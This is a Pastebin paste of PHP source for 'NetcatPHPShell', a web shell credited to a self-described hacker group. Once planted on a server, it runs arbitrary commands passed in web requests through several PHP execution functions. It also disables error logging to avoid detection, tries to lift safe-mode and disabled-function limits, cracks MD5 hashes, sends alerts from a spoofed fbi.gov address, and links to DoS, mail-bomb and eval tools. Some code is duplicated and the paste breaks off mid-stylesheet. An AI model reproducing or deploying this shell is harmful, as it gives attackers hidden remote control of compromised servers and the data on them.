Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- #############################################
- # ––•(–•- NetcatPHPShell –•–)•–– #
- # .::+ :Leech by K0eN: +::. #
- # NetcatPHPShell ( Released on 9/16/12 ) #
- # Email: K0eN@haxor.co #
- #############################################
- */
- error_reporting(0);
- ini_set('max_execution_time',0);
- // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\
- /**************** Defines *********************************/
- $greeting = "";
- $user = "root";
- $pass = "netcat";
- $lock = "on"; // set this to off if you dont need the login page
- $antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
- $tracebackFeature = "off"; // set this feature to enable email alerts
- $ownerEmail = "K0eN@haxor.co"; // Change this to your email , This email is used to deliver tracebacks about your shell
- $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
- $phpVersion=phpversion();
- $self=$_SERVER["PHP_SELF"]; // Where am i
- $sm = @ini_get('safe_mode');
- $SEPARATOR = '/'; // Default Directory separator
- $os = "N/D";
- if(stristr(php_uname(),"Windows"))
- {
- $SEPARATOR = '\\';
- $os = "Windows";
- }
- else if(stristr(php_uname(),"Linux"))
- {
- $os = "Linux";
- }
- //*************************************************************/
- // -------------- Traceback Functions
- function sendLoginAlert()
- {
- global $ownerEmail;
- global $url;
- $accesedIp = $_SERVER['REMOTE_ADDR'];
- $randomInt = rand(0,1000000); # to avoid id blocking
- $from = "ani-shell$randomInt@fbi.gov";
- //echo $from;
- if(function_exists('mail'))
- {
- $subject = "Shell Accessed -- Ani-Shell --";
- $message = "
- Hey Owner ,
- Your Shell(Ani-Shell) located at $url was accessed by $accesedIp
- If its not you :-
- 1. Please check if the shell is secured.
- 2. Change your user name and Password.
- 3. Check if lock is 0n!
- and Kick that ****** out!
- Thanking You
- Yours Faithfully
- Ani-Shell
- ";
- mail($ownerEmail,$subject,$message,'From:'.$from);
- }
- }
- //---------------------------------------------------------
- if(function_exists('session_start') && $lock == 'on')
- {
- session_start();
- }
- else
- {
- // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
- $lock = 'off';
- }
- //logout
- if(isset($_GET['logout']) && $lock == 'on')
- {
- $_SESSION['authenticated'] = 0;
- session_destroy();
- header("location: ".$_SERVER['PHP_SELF']);
- }
- ini_set('max_execution_time',0);
- /***************** Restoring *******************************/
- ini_restore("safe_mode_include_dir");
- ini_restore("safe_mode_exec_dir");
- ini_restore("disable_functions");
- ini_restore("allow_url_fopen");
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- if(function_exists('ini_set'))
- {
- ini_set('error_log',NULL); // No alarming logs
- ini_set('log_errors',0); // No logging of errors
- ini_set('file_uploads',1); // Enable file uploads
- ini_set('allow_url_fopen',1); // allow url fopen
- }
- else
- {
- ini_alter('error_log',NULL);
- ini_alter('log_errors',0);
- ini_alter('file_uploads',1);
- ini_alter('allow_url_fopen',1);
- }
- // ----------------------------------------------------------------------------------------------------------------
- ?>
- <html>
- <head>
- <title>––•(–•- NetcatPHPShell –•–)•–– | | Made by Mr.H4rD3n</title>
- <?php
- if($antiCrawler != 'off')
- {
- ?>
- <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
- <?php
- }
- ?>
- <style>
- /*
- ==========================
- CSS Section
- ==========================
- */
- *{
- padding:0;
- margin:0;
- }
- .alert
- {
- background:red;
- color:white;
- font-weight:bold;
- }
- td.info
- {
- width:0px;
- }
- .bind
- {
- border: 1px solid #333333;
- margin: 15px auto 0;
- font-size: small;
- }
- div.end *
- {
- font-size:small;
- }
- div.end
- {
- width:100%;
- background:#529ADE;
- }
- p.blink
- {
- text-decoration: blink;
- }
- body
- {
- background-color:black;
- color:rgb(35,182,39);
- font-family:Tahoma,Verdana,Arial;
- font-size: small;
- }
- input.own {
- background-color: Green;
- color: white;
- border : 1px solid #529ADE;
- }
- blockquote.small
- {
- font-size: smaller;
- color: silver;
- text-align: center;
- }
- table.files
- {
- border-spacing: 10px;
- font-size: small;
- }
- h1 {
- padding: 4px;
- padding-bottom: 0px;
- margin-right : 5px;
- }
- div.logo
- {
- border-right: 1px aqua solid;
- }
- div.header
- {
- padding-left: 5px;
- font-size: small;
- text-align: left;
- }
- div.nav
- {
- margin-top:1px;
- height:30px;
- background-color: #529ADE;
- }
- div.nav ul
- {
- list-style: none;
- padding: 4px;
- }
- div.nav li
- {
- float: left;
- margin-right: 10px;
- text-align:center;
- }
- textarea.cmd
- {
- border : 1px solid #111;
- background-color : green;
- font-family: Shell;
- color : white;
- margin-top: 10px;
- font-size:small;
- }
- input.cmd
- {
- background-color:black;
- color: white;
- width: 400px;
- border : 1px solid #529ADE;
- }
- td.maintext
- {
- font-size: large;
- }
- #margins
- {
- margin-left: 10px;
- margin-top: 10px;
- color:white;
- }
- table.top
- {
- border-bottom: 1px solid aqua;
- width: 100%;
- }
- #borders
- {
- border-top : 1px solid aqua;
- border-left:1px solid aqua;
- border-bottom: 1px solid aqua;
- border-right: 1px solid aqua;
- margin-bottom:0;
- }
- td.file a , .file a
- {
- color : aqua;
- text-decoration:none;
- }
- a.dir
- {
- color:white;
- font-weight:bold;
- text-decoration:none;
- }
- td.dir a
- {
- color : white;
- text-decoration:none;
- }
- td.download,td.download2
- {
- color:green;
- }
- #spacing
- {
- padding:10px;
- margin-left:200px;
- }
- th.header
- {
- background: none repeat scroll 0 0 #191919;
- color: white;
- border-bottom : 1px solid #333333;
- }
- p.warning
- {
- background : red;
- color: white;
- }
- /*
- --------------------------------CSS END------------------------------------------------------
- */
- </style>
- </head>
- <body text="rgb(39,245,10)" bgcolor="black" style="background-color:#000000">
- <?php
- if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
- {
- if( $_POST['user'] == $user &&
- $_POST['pass'] == $pass )
- {
- $_SESSION['authenticated'] = 1;
- // --------------------- Tracebacks --------------------------------
- if($tracebackFeature == 'On')
- {
- sendLoginAlert();
- }
- // ------------------------------------------------------------------
- }
- }
- if($lock == 'off')
- {?>
- <p class="warning"><font color="#FF0000"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
- <?php
- }
- if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
- {
- ?>
- <table height="421" width="993">
- <tbody>
- <tr>
- <td width="448">
- <pre>
- <font color="Orange">
- <b>
- </b></font><b><font color="#19D2FE">[]======================================[]
- []-----------</font><font color="#FFFFFF">NetcatPHPShell</font><font color="#19D2FE">-------------[]
- []---------------</font><font color="#CC6600">Private</font><font color="#19D2FE">----------------[]
- []======================================[]
- [] </font><font color="#FFFFFF">–</font><font color="#19D2FE">–</font><font color="#FF0000">•(</font><font color="#19D2FE">-• c0d3d by Mr.H4rD3n •-</font><font color="#FF0000">)•</font><font color="#19D2FE">–</font><font color="#FFFFFF">–</font><font color="#19D2FE"> []</font></b></pre>
- <pre>
- <b><font color="#19D2FE">[]======================================[]
- [] NetcatPHPShell Released on </font><font color="#FFFFFF">11/04/12</font><font color="#19D2FE"> []</font></b></pre>
- <pre>
- <b><font color="#19D2FE">[]======================================[]
- [] </font><font color="#CC6600">WeLcOmE Master Of The Server !</font><font color="#19D2FE"> []
- []======================================[]</font></b></pre>
- <pre><b><font color="#19D2FE">[] Moroccan </font><font color="#FFFFFF">Hackers</font><font color="#19D2FE"> []
- [] </font><font color="#FFFFFF">Moroccan</font><font color="#19D2FE"> C0d3r []</font></b></pre>
- <pre><b><font color="#19D2FE">[] Moroccan </font><font color="#FFFFFF">Masters </font><font color="#19D2FE">[]</font></b></pre>
- <pre><b><font color="#19D2FE">[]======================================[]
- [] </font><font color="#CC6600">MaD </font><font color="#FFFFFF">In</font><font color="#CC6600"> </font><font color="#19D2FE">MoRoCcO []</font></b></pre>
- <pre><b><font color="#19D2FE">[]======================================[]
- [] []
- [] </font><font color="#CC6600">Netcat</font><font color="#19D2FE"> </font><font color="#FFFFFF">PHP Connect to Server</font><font color="#19D2FE"> []</font></b></pre>
- <pre><b><font color="#19D2FE">[] []
- []======================================[]
- [] </font><font color="#CC6600">My Groupe</font><font color="#19D2FE"> </font><font color="#FFFFFF">IsLamiC Warrior Team</font><font color="#19D2FE"> []
- []======================================[]
- [] </font><font color="#FF0000"> </font><font color="#CC6600">Email:</font><font color="#19D2FE"> </font><font color="#FFFFFF">exploit-id@hotmail.com</font><font color="#19D2FE"> []
- [] </font><font color="#CC6600"> Facebook :</font><font color="#19D2FE"> </font><font color="#FFFFFF">Facebook.com/Mr.H4rD3n</font> <font color="#19D2FE">[]
- []</font><font color="#19D2FE">======================================[]</font><font color="grey">
- </font></b><font color="grey">
- </pre>
- </td>
- <td>
- <h1><?php echo $greeting;?></h1>
- <img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><br /><br />
- <form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
- <input name="user" value="UserNamE" style="color: #19D2FE; background-color: #000000" size="20"/>
- <input name="pass" type="password" value="passwd" style="color: #19D2FE; background-color: #000000" size="20"/>
- <input class="own" type="submit" value="GO TO HeLL" style="color: #42CFF9; background-color: #000000"/>
- </form>
- </td>
- </tr>
- </tbody>
- </table>
- <?php
- }
- //---------------------------------- We are authenticated now-------------------------------------
- //Launch the shell
- else
- {
- //---------------------------------- Fuctions ---------------------------------------------------
- function showDrives()
- {
- global $self;
- foreach(range('A','Z') as $drive)
- {
- if(is_dir($drive.':\\'))
- {
- ?>
- <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
- <?php echo $drive.":\\" ?>
- </a>
- <?php
- }
- }
- }
- function HumanReadableFilesize($size)
- {
- $mod = 1024;
- $units = explode(' ','B KB MB GB TB PB');
- for ($i = 0; $size > $mod; $i++)
- {
- $size /= $mod;
- }
- return round($size, 2) . ' ' . $units[$i];
- }
- function getClientIp()
- {
- echo $_SERVER['REMOTE_ADDR'];
- }
- function getServerIp()
- {
- echo getenv('SERVER_ADDR');
- }
- function getSoftwareInfo()
- {
- echo php_uname();
- }
- function diskSpace()
- {
- echo HumanReadableFilesize(disk_total_space("/"));
- }
- function freeSpace()
- {
- echo HumanReadableFilesize(disk_free_space("/"));
- }
- function getSafeMode()
- {
- global $sm;
- echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF");
- }
- function getDisabledFunctions()
- {
- if(!ini_get('disable_functions'))
- {
- echo "None";
- }
- else
- {
- echo @ini_get('disable_functions');
- }
- }
- function getFilePermissions($file)
- {
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- /***********************************************************/
- // exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
- // Turned OfF!
- /**********************************************************/
- function exec_all($command)
- {
- $output = '';
- if(function_exists('exec'))
- {
- exec($command,$output);
- $output = join("\n",$output);
- }
- else if(function_exists('shell_exec'))
- {
- $output = shell_exec($command);
- }
- else if(function_exists('popen'))
- {
- $handle = popen($command , "r"); // Open the command pipe for reading
- if(is_resource($handle))
- {
- if(function_exists('fread') && function_exists('feof'))
- {
- while(!feof($handle))
- {
- $output .= fread($handle, 512);
- }
- }
- else if(function_exists('fgets') && function_exists('feof'))
- {
- while(!feof($handle))
- {
- $output .= fgets($handle,512);
- }
- }
- }
- pclose($handle);
- }
- else if(function_exists('system'))
- {
- ob_start(); //start output buffering
- system($command);
- $output = ob_get_contents(); // Get the ouput
- ob_end_clean(); // Stop output buffering
- }
- else if(function_exists('passthru'))
- {
- ob_start(); //start output buffering
- passthru($command);
- $output = ob_get_contents(); // Get the ouput
- ob_end_clean(); // Stop output buffering
- }
- else if(function_exists('proc_open'))
- {
- $descriptorspec = array(
- 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
- );
- $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
- if(is_resource($handle))
- {
- if(function_exists('fread') && function_exists('feof'))
- {
- while(!feof($pipes[1]))
- {
- $output .= fread($pipes[1], 512);
- }
- }
- else if(function_exists('fgets') && function_exists('feof'))
- {
- while(!feof($pipes[1]))
- {
- $output .= fgets($pipes[1],512);
- }
- }
- }
- pclose($handle);
- }
- else
- {
- $output = "They have their Security there! :( ";
- }
- return(htmlspecialchars($output));
- }
- function magicQuote($text)
- {
- if (!get_magic_quotes_gpc())
- {
- return $text;
- }
- return stripslashes($text);
- }
- function md5Crack($hash , $list)
- {
- $fd = fopen($list,"r");
- if( strlen($hash) != 32 || $fd == FALSE)
- {
- // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
- return "<p class='warning'>Hash or List invalid!</p>";
- }
- else
- {
- $pwdList = fread($fd,512);
- $pwdList = explode("\n",$pwdList);
- echo "Words Checked :-<br /><br />\n";
- foreach($pwdList as $pwd)
- {
- $pwd = trim($pwd);
- echo "<br />[*] ".$pwd;
- if(md5($pwd) == $hash )
- {
- return "<br /><br /><br />\n<h2>Hash Cracked</h2><br /><br />\n<p class='warning'>Planintext : $pwd</p>";
- }
- }
- }
- }
- //------------------------------------------------------------------------------------------------
- ?>
- <div class="nav" style="width: 1005px; height: 49px">
- <ul>
- <li><a href="<?php echo $self;?>"></a></li>
- <li><a href="<?php echo $self.'?upload';?>"></a></li>
- <li><a href="<?php echo $self.'?shell';?>"></a></li>
- <li><a href="<?php echo $self.'?dos';?>"></a></li>
- <li><a href="<?php echo $self.'?fuzz';?>"></a></li>
- <li><a href="<?php echo $self.'?mail'?>"></a></li>
- <li><a href="<?php echo $self.'?bomb'?>"></a></li>
- <li><a href="<?php echo $self.'?connect'?>"></a></li>
- <li><a href="<?php echo $self.'?injector'?>"></a></li>
- <li><a href="<?php echo $self.'?decode'?>"></a></li>
- <li><a href="<?php echo $self.'?eval'?>"></a></li>
- <li><a href="<?php echo $self.'?md5'?>"></a></li>
- <?php if($lock == 'on')
- {
- ?>
- <li> <font face="Times New Roman" size="4"> </font><font face="Times New Roman" size="5">
- </font>
- <i><font face="Verdana" size="5">
- <a href="<?php echo $self.'?logout'?>">
- <font color="#FFFFFF"><span style="text-decoration: none">Logout</span></font></a></font></i><font color="#FF0000"><b><i><font face="Verdana" size="5"></li></font></i><font face="Verdana" size="5"> </font>
- </b><font face="Times New Roman" size="5">
- <?php
- }
- ?>
- </font>
- </font>
- </ul>
- </div>
- <?php
- //-------------------------------- Check what he wants -------------------------------------------
- // Shell
- if(isset($_GET['shell']))
- {
- if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
- {
- $result = "";
- }
- else
- {
- $result=exec_all($_GET['cmd']);
- }
- ?>
- <?php
- }
- //Rename
- else if(isset($_GET['rename']))
- {
- if(isset($_GET['to']) && isset($_GET['rename']))
- {
- if(rename($_GET['rename'],$_GET['to']) == FALSE)
- {
- ?>
- <?php
- }
- }
- else
- {
- ?>
- <?php
- }
- }
- // No request made
- // Display home page
- else
- {
- $dir = getcwd();
- if(isset($_GET['dir']))
- {
- $dir = $_GET['dir'];
- }
- ?>
- <p> </p>
- <?php
- $aliases = array('la' => 'ls -la',
- 'll' => 'ls -lvhF',
- 'dir' => 'ls' );
- $passwd = array('' => '');
- error_reporting(0);
- class phpTerm {
- function formatPrompt() {
- $user=shell_exec("whoami");
- $host=explode(".", shell_exec("uname -n"));
- $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
- }
- function checkPassword($passwd) {
- if(!isset($_SERVER['PHP_AUTH_USER'])||
- !isset($_SERVER['PHP_AUTH_PW']) ||
- !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
- $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
- @session_start();
- return true;
- }
- else {
- @session_start();
- return true;
- }
- }
- function initVars()
- {
- if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
- {
- $_SESSION['cwd'] = getcwd();
- $_SESSION['history'] = array();
- $_SESSION['output'] = '';
- $_REQUEST['command'] ='';
- }
- }
- function buildCommandHistory()
- {
- if(!empty($_REQUEST['command']))
- {
- if(get_magic_quotes_gpc())
- {
- $_REQUEST['command'] = stripslashes($_REQUEST['command']);
- }
- // drop old commands from list if exists
- if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
- {
- unset($_SESSION['history'][$i]);
- }
- array_unshift($_SESSION['history'], $_REQUEST['command']);
- // append commmand */
- $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
- }
- }
- function buildJavaHistory()
- {
- // build command history for use in the JavaScript
- if (empty($_SESSION['history']))
- {
- $_SESSION['js_command_hist'] = '""';
- }
- else
- {
- $escaped = array_map('addslashes', $_SESSION['history']);
- $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
- }
- }
- function outputHandle($aliases)
- {
- if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
- {
- $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
- }
- elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
- {
- // The current command is 'cd', which we have to handle as an internal shell command.
- // absolute/relative path ?"
- ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
- // cosmetics
- while (strpos($new_dir, '/./') !== false)
- $new_dir = str_replace('/./', '/', $new_dir);
- while (strpos($new_dir, '//') !== false)
- $new_dir = str_replace('//', '/', $new_dir);
- while (preg_match('|/\.\.(?!\.)|', $new_dir))
- $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
- if(empty($new_dir)): $new_dir = "/"; endif;
- (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
- }
- else
- {
- /* The command is not a 'cd' command, so we execute it after
- * changing the directory and save the output. */
- chdir($_SESSION['cwd']);
- /* Alias expansion. */
- $length = strcspn($_REQUEST['command'], " \t");
- $token = substr(@$_REQUEST['command'], 0, $length);
- if (isset($aliases[$token]))
- $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
- $p = proc_open(@$_REQUEST['command'],
- array(1 => array('pipe', 'w'),
- 2 => array('pipe', 'w')),
- $io);
- /* Read output sent to stdout. */
- while (!feof($io[1])) {
- $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
- }
- /* Read output sent to stderr. */
- while (!feof($io[2])) {
- $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
- }
- fclose($io[1]);
- fclose($io[2]);
- proc_close($p);
- }
- }
- } // end phpTerm
- /*##########################################################
- ## The main thing starts here
- ## All output ist XHTML
- ##########################################################*/
- $terminal=new phpTerm;
- @session_start();
- $terminal->initVars();
- $terminal->buildCommandHistory();
- $terminal->buildJavaHistory();
- if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
- $terminal->outputHandle($aliases);
- header('Content-Type: text/html; charset=UTF-8');
- echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
- "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
- <head>
- <title>.:: --+ NeTCaTPHPShell +-- ::.</title>
- <script type="text/javascript" language="JavaScript">
- var current_line = 0;
- var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
- var last = 0;
- function key(e) {
- if (!e) var e = window.event;
- if (e.keyCode == 38 && current_line < command_hist.length-1) {
- command_hist[current_line] = document.shell.command.value;
- current_line++;
- document.shell.command.value = command_hist[current_line];
- }
- if (e.keyCode == 40 && current_line > 0) {
- command_hist[current_line] = document.shell.command.value;
- current_line--;
- document.shell.command.value = command_hist[current_line];
- }
- }
- function init() {
- document.shell.setAttribute("autocomplete", "off");
- document.shell.output.scrollTop = document.shell.output.scrollHeight;
- document.shell.command.focus();
- }
- </script>
- <style type="text/css">
- body {font-family: sans-serif; color: black; background: white;}
- table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
- td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
- textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
- p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
- input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
- </style>
- </head>
- <body onload="init()" style="background-color:#000000">
- nd )'<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>
- <div align="center">
- <img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><p>
- <font color="#FFFFFF">
- -------------------------------------------------------------------------------------</font></p>
- <p><font face="Times New Roman" color="#529ADE" size="4">–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font><font color="#FF0000" face="Times New Roman" size="4">–•</font><font size="4"><font color="#42CFF9" face="Times New Roman">(</font><font color="#FF0000" face="Times New Roman">-</font><font color="#27F50A" face="Times New Roman">•</font><b><font color="#529ADE" face="Times New Roman">
- © Copyright </font><font color="#FF0000" face="Times New Roman">Mr.H4rD3n</font><font color="#529ADE" face="Times New Roman">
- </font><font color="#FFFF00" face="Times New Roman">[ </font><font color="#529ADE" face="Times New Roman">All
- rights reserved </font><font color="#FFFF00" face="Times New Roman">]</font><font color="#529ADE" face="Times New Roman">
- </font><font color="#27F50A" face="Times New Roman">•</font><font color="#FF0000" face="Times New Roman">-</font><font color="#42CFF9" face="Times New Roman">)</font></b></font><b><font color="#FF0000" face="Times New Roman" size="4">•–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font></b></p>
- <p>
- <font color="#FFFFFF">
- -------------------------------------------------------------------------------------</font></p>
- <p><font face="Comic Sans MS" color="#42CFF9">Get Commands to Server - Bypass</font></p>
- <table cellpadding="0" cellspacing="0">
- <tr><td class="head" style="color: #000000;"><font color="#FFFFFF"><b>X</b></font></td>
- <td class="head"><font color="#FFFFFF"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
- </font>
- </td></tr>
- <tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
- <textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
- <?php
- $lines = substr_count($_SESSION['output'], "\n");
- $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
- echo rtrim($padding . $_SESSION['output']);
- ?>
- </textarea>
- <p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
- <input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
- </p>
- <? /*<p>
- <input type="submit" value="Execute Command" />
- <input type="submit" name="reset" value="Reset" />
- Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
- </p>
- */
- ?>
- </form></td></tr>
- </body>
- </html>
- <?php ?>
- <?php
- $aliases = array('la' => 'ls -la',
- 'll' => 'ls -lvhF',
- 'dir' => 'ls' );
- $passwd = array('' => '');
- error_reporting(1);
- class phpTerm {
- function formatPrompt() {
- $user=shell_exec("whoami");
- $host=explode(".", shell_exec("uname -n"));
- $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
- }
- function checkPassword($passwd) {
- if(!isset($_SERVER['PHP_AUTH_USER'])||
- !isset($_SERVER['PHP_AUTH_PW']) ||
- !isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
- $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
- @session_start();
- return true;
- }
- else {
- @session_start();
- return true;
- }
- }
- function initVars()
- {
- if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
- {
- $_SESSION['cwd'] = getcwd();
- $_SESSION['history'] = array();
- $_SESSION['output'] = '';
- $_REQUEST['command'] ='';
- }
- }
- function buildCommandHistory()
- {
- if(!empty($_REQUEST['command']))
- {
- if(get_magic_quotes_gpc())
- {
- $_REQUEST['command'] = stripslashes($_REQUEST['command']);
- }
- // drop old commands from list if exists
- if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
- {
- unset($_SESSION['history'][$i]);
- }
- array_unshift($_SESSION['history'], $_REQUEST['command']);
- // append commmand */
- $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
- }
- }
- function buildJavaHistory()
- {
- // build command history for use in the JavaScript
- if (empty($_SESSION['history']))
- {
- $_SESSION['js_command_hist'] = '""';
- }
- else
- {
- $escaped = array_map('addslashes', $_SESSION['history']);
- $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
- }
- }
- function outputHandle($aliases)
- {
- if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
- {
- $_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
- }
- elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
- {
- // The current command is 'cd', which we have to handle as an internal shell command.
- // absolute/relative path ?"
- ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
- // cosmetics
- while (strpos($new_dir, '/./') !== false)
- $new_dir = str_replace('/./', '/', $new_dir);
- while (strpos($new_dir, '//') !== false)
- $new_dir = str_replace('//', '/', $new_dir);
- while (preg_match('|/\.\.(?!\.)|', $new_dir))
- $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
- if(empty($new_dir)): $new_dir = "/"; endif;
- (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
- }
- else
- {
- /* The command is not a 'cd' command, so we execute it after
- * changing the directory and save the output. */
- chdir($_SESSION['cwd']);
- /* Alias expansion. */
- $length = strcspn($_REQUEST['command'], " \t");
- $token = substr(@$_REQUEST['command'], 0, $length);
- if (isset($aliases[$token]))
- $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
- $p = proc_open(@$_REQUEST['command'],
- array(1 => array('pipe', 'w'),
- 2 => array('pipe', 'w')),
- $io);
- /* Read output sent to stdout. */
- while (!feof($io[1])) {
- $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
- }
- /* Read output sent to stderr. */
- while (!feof($io[2])) {
- $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
- }
- fclose($io[1]);
- fclose($io[2]);
- proc_close($p);
- }
- }
- } // end phpTerm
- /*##########################################################
- ## The main thing starts here
- ## All output ist XHTML
- ##########################################################*/
- $terminal=new phpTerm;
- @session_start();
- $terminal->initVars();
- $terminal->buildCommandHistory();
- $terminal->buildJavaHistory();
- if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
- $terminal->outputHandle($aliases);
- header('Content-Type: text/html; charset=UTF-8');
- echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
- /*##########################################################
- ## safe mode increase
- ## bloque fonction
- ##########################################################*/
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
- "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
- <head>
- <title>\-( CMD Command )-/</title>
- <script type="text/javascript" language="JavaScript">
- var current_line = 0;
- var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
- var last = 0;
- function key(e) {
- if (!e) var e = window.event;
- if (e.keyCode == 38 && current_line < command_hist.length-1) {
- command_hist[current_line] = document.shell.command.value;
- current_line++;
- document.shell.command.value = command_hist[current_line];
- }
- if (e.keyCode == 40 && current_line > 0) {
- command_hist[current_line] = document.shell.command.value;
- current_line--;
- document.shell.command.value = command_hist[current_line];
- }
- }
- function init() {
- document.shell.setAttribute("autocomplete", "off");
- document.shell.output.scrollTop = document.shell.output.scrollHeight;
- document.shell.command.focus();
- }
- </script>
- <style type="text/css">
